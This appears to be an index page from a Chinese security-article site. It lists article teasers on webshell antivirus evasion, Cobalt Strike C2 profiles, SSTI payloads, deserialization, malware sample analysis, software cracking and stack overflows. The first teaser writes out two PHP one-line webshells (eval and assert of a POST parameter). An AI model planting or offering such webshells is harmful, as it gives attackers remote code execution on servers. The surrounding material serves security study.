0X00普通的一句话木马(适用于CTF和小站)<?php eval($_POST['a']); ?>//函数的相似替换<?php assert($_POST['a']); ?>...
09月23日26 views评论eval
字符串
关于PHP的webshell免杀小结
09月23日26 views评论eval
字符串
09月23日26 views评论eval
字符串
免杀项目学习-1
开头有段时间对免杀十分感兴趣,想了想好久没在公众号发东西了,一直以来都是写语雀(这可真是好东西啊),决定把以前学习别人项目的和自己试着做的免杀(已失效)的记录发出来凑一凑文章项目分析github:ht...
09月23日33 views评论shellcode
字符串
CS4.5修复C2Profile中本地时间不一致问题【增加convertDate】
△△△点击上方“蓝字”关注我们了解更多精彩0x00 免责声明在学习本文技术或工具使用前,请您务必审慎阅读、充分理解各条款内容。1、本团队分享的任何类型技术、工具文章等文章仅面向合法授权的企业...
09月20日36 views评论profile
字符串
CS4.5修复C2Profile中本地时间不一致问题
△△△点击上方“蓝字”关注我们了解更多精彩0x00 免责声明在学习本文技术或工具使用前,请您务必审慎阅读、充分理解各条款内容。1、本团队分享的任何类型技术、工具文章等文章仅面向合法授权的企业...
09月19日29 views评论profile
字符串
Go语言-自学篇-2
免责声明写在前面:内容仅用于学习交流使用;由于传播、利用本安全猎人所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号安全猎人安全及作者不为此承担任何责任,一旦造成后果请使用者...
09月14日28 views评论go语言
字符串
SnakeYaml反序列化
出品|先知社区(ID:dawntown)“声明以下内容,来自先知社区的dawntown作者原创,由于传播,利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,长白山攻防实验室以...
09月14日40 views评论反序列化
序列化
格式化处理工具StringFormat
格式化处理工具StringFormat 在办案的过程中,经常碰到大文本内容的文件,但不是很规整的格式,要进行格式化处理;手工改量太大,就萌生了自动化处理的想法,在不同的场景中进行了实战磨合,...
08月28日31 views评论字符串
手机号码
一文了解SSTI和所有常见payload 以flask模板为例
一文了解SSTI和所有常见payload 以flask模板为例前言做的ctf题里有好几道跟SSTI有关故对SSTI进行学习在此做个小结与记录主要是flask模板后面遇到别的模板再陆续记录1、什么是SS...
08月28日86 views评论payload
request
带加密字符串的.NET样本分析的一些技巧
本文为看雪论坛优秀文章看雪论坛作者ID:一枝笔日常遇到的样本,前两层主要就是解密dll文件,加载,不做分析,从第三层开始。 由于程序本身被混淆,尝试使用de4dot效果不明显,字符串全部被加...
08月22日50 views评论using
字符串
某去水印软件爆破思路
额,我没学过汇编,也不会用x64dbg,所以做的不完美,大佬看(xiao)看(xiao)就行了。PS最近老奔溃,想起来电脑上还有个快速去水印的小工具,打开更新了下版本到最新,提示要注册,网上搜了下好像...
08月14日154 views评论x
字符串
静态防护技术
静态防护技术是面向App程序组成部分的防护,通过防护程序代码来提高App的安全性。本章主要从两方面介绍静态防护技术:一是针对App源代码的保护技术;二是针对apk文件的加固技术,包括针对dex文件、资...
08月07日24 views评论字符串
源代码
溢出漏洞-栈溢出漏洞与原理分析
01栈溢出如果向栈上声明的缓冲区中复制数据,但是复制到数据量又比缓冲区大的时候,就会发生栈溢出。在栈上声明的各种变量的位置紧临函数调用程序的返回地址。若用户输入的数据未经验证就传递给strcpy这样的...
08月03日82 views评论恶意代码
攻击者
20